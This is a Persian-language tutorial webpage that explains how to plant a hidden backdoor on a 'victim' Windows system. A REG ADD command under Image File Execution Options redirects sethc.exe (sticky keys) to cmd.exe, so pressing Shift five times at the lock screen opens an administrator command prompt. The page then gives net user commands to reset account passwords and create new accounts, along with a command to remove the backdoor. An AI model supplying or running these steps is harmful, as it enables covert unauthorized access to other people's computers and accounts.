تماس

ایجاد یک راه مخفی در سیستم قربانی به منظور تغییر رمز عبور و ورود به ویندوز


در این ترفند قصد داریم به معرفی راهی بپردازیم که از طریق آن می‌توانید در صفحه‌ی ورود به حساب‌های کاربری ویندوز و پیش از وارد کردن نام کاربری و پسورد، پنجره‌ی Command Prompt ویندوز را باز کنید. اگر با CMD ویندوز آشنایی داشته باشید حتماً می‌دانید که دستیابی به این پنجره پیش از ورود به محیط ویندوز، آن هم با دسترسی Administrator یعنی دسترسی به همه‌چیز! از این رو، تیتر این ترفند را می‌توان «ایجاد یک راه مخفی در سیستم قربانی به منظور تغییر رمز عبور و ورود به ویندوز» دانست، چرا که اگر این کار را در یک سیستم انجام دهید، از این پس می‌توانید به صورت مخفیانه رمز عبور حساب‌های کاربری را تغییر دهید، حساب کاربری جدید بسازید و حتی در همان صفحه‌ی Lock، فایل‌های اجرایی نظیر نرم‌افزارهای مختلف را نیز باز کنید.

با این ترفند می‌توانید به نوعی یک Backdoor ایجاد کنید. Backdoor راه عبوری است که به صورت مخفیانه از این پس برای شما برای دسترسی به ویندوز پدید می‌آید. این ترفند بر روی کلیه نسخه‌های ویندوز امکان‌پذیر است.

بدین منظور:
ابتدا درمحیط ویندوز کلیدهای ترکیبی Win+R را فشار دهید.
در پنجره‌ی Run عبارت cmd را وارد کرده و Enter بزنید.
پس از باز شدن پنجره‌ی Command Prompt دستور زیر را وارد کرده و Enter بزنید:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

نمایش پیغام The operation completed successfully به معنای موفقیت‌آمیز بودن کار است.
اکنون کافی است از حساب کاربری Log Off کنید و در صفحه‌ی ورود به حساب‌های کاربری ویندوز یا همان صفحه‌ی Lock، کلید Shift را ۵ بار پشت هم فشار دهید و یا کلیدهای ترکیبی Alt+Shift+PrintScreen را وارد کنید.
خواهید دید که با این کار پنجره‌ی CMD نمایان می‌شود.
اکنون می‌توانید کارهای دلخواه خود با CMD نظیر اجرای برنامه‌های مختلف، تغییر رمز عبور یک حساب کاربری یا ساخت یک حساب کاربری جدید را انجام دهید.
به عنوان مثال با وارد کردن عبارت taskmgr به Task Manager دسترسی خواهید داشت.
و یا با وارد کردن دستور زیر می‌توانید رمز عبور یک حساب کاربری را تغییر دهید:

net user user_name new_password

هم‌چنین با دستور زیر می‌توان یک حساب کاربری جدید ایجاد کرد:

net user user_name password /add

در این دستورات به جای user_name نام حساب کاربری مورد نظر و به جای new_password رمز عبور مد نظر خود را قرار دهید.

برای پاک کردن این Backdoor نیز می‌توانید از این دستور در محیط CMD استفاده کنید:

REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"

ارسال یک نظر